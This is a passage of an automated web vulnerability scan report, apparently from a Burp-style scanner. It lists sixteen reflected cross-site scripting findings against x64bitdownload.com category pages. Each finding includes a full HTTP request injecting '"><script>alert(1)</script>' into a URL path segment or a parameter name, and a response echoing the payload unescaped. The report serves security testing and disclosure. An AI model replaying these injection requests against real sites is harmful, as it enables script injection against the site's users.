Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-desktop-downloads-4-0-d.htmld7de5"><script>alert(1)</script>3c381f515e3" />
...[SNIP]...

4.1673. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3aea"><script>alert(1)</script>baafb6db136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.html?b3aea"><script>alert(1)</script>baafb6db136=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-desktop-downloads-4-0-d.html?b3aea"><script>alert(1)</script>baafb6db136=1" />
...[SNIP]...

4.1674. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec4b"><script>alert(1)</script>598f0083468 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories2ec4b"><script>alert(1)</script>598f0083468/free-64-bit-development-downloads-5-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:33:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories2ec4b"><script>alert(1)</script>598f0083468/free-64-bit-development-downloads-5-0-d.html" />
...[SNIP]...

4.1675. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b81e"><script>alert(1)</script>bcc56172be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html5b81e"><script>alert(1)</script>bcc56172be7 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-development-downloads-5-0-d.html5b81e"><script>alert(1)</script>bcc56172be7" />
...[SNIP]...

4.1676. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7654"><script>alert(1)</script>5fed9989261 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-development-downloads-5-0-d.html?d7654"><script>alert(1)</script>5fed9989261=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:53 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-development-downloads-5-0-d.html?d7654"><script>alert(1)</script>5fed9989261=1" />
...[SNIP]...

4.1677. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d364"><script>alert(1)</script>136359d2933 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories1d364"><script>alert(1)</script>136359d2933/free-64-bit-education-downloads-6-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories1d364"><script>alert(1)</script>136359d2933/free-64-bit-education-downloads-6-0-d.html" />
...[SNIP]...

4.1678. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8f59"><script>alert(1)</script>ff671245bd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-education-downloads-6-0-d.htmlf8f59"><script>alert(1)</script>ff671245bd6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-education-downloads-6-0-d.htmlf8f59"><script>alert(1)</script>ff671245bd6" />
...[SNIP]...

4.1679. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bca"><script>alert(1)</script>6ff9196ddc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-education-downloads-6-0-d.html?b4bca"><script>alert(1)</script>6ff9196ddc8=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-education-downloads-6-0-d.html?b4bca"><script>alert(1)</script>6ff9196ddc8=1" />
...[SNIP]...

4.1680. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d9ce"><script>alert(1)</script>2ed7bbf475d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories8d9ce"><script>alert(1)</script>2ed7bbf475d/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:34:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories8d9ce"><script>alert(1)</script>2ed7bbf475d/free-64-bit-games-entertainment-downloads-7-0-d.html" />
...[SNIP]...

4.1681. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e40"><script>alert(1)</script>ceaef40d2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.htmle3e40"><script>alert(1)</script>ceaef40d2d6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-games-entertainment-downloads-7-0-d.htmle3e40"><script>alert(1)</script>ceaef40d2d6" />
...[SNIP]...

4.1682. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a05c7"><script>alert(1)</script>0644b46147f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html?a05c7"><script>alert(1)</script>0644b46147f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-games-entertainment-downloads-7-0-d.html?a05c7"><script>alert(1)</script>0644b46147f=1" />
...[SNIP]...

4.1683. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17d7f"><script>alert(1)</script>2644ecf6c0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories17d7f"><script>alert(1)</script>2644ecf6c0e/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:35:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories17d7f"><script>alert(1)</script>2644ecf6c0e/free-64-bit-graphic-apps-downloads-8-0-d.html" />
...[SNIP]...

4.1684. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a94a6"><script>alert(1)</script>4f8ac4abfac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.htmla94a6"><script>alert(1)</script>4f8ac4abfac HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-graphic-apps-downloads-8-0-d.htmla94a6"><script>alert(1)</script>4f8ac4abfac" />
...[SNIP]...

4.1685. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c898"><script>alert(1)</script>5c39625c5a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html?6c898"><script>alert(1)</script>5c39625c5a2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-graphic-apps-downloads-8-0-d.html?6c898"><script>alert(1)</script>5c39625c5a2=1" />
...[SNIP]...

4.1686. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe96"><script>alert(1)</script>9b581e63618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesbfe96"><script>alert(1)</script>9b581e63618/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:36:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesbfe96"><script>alert(1)</script>9b581e63618/free-64-bit-home-hobby-downloads-9-0-d.html" />
...[SNIP]...

4.1687. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb1e1"><script>alert(1)</script>16ffae90b65 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.htmlbb1e1"><script>alert(1)</script>16ffae90b65 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-home-hobby-downloads-9-0-d.htmlbb1e1"><script>alert(1)</script>16ffae90b65" />
...[SNIP]...

4.1688. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c50ab"><script>alert(1)</script>641fff062a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html?c50ab"><script>alert(1)</script>641fff062a5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
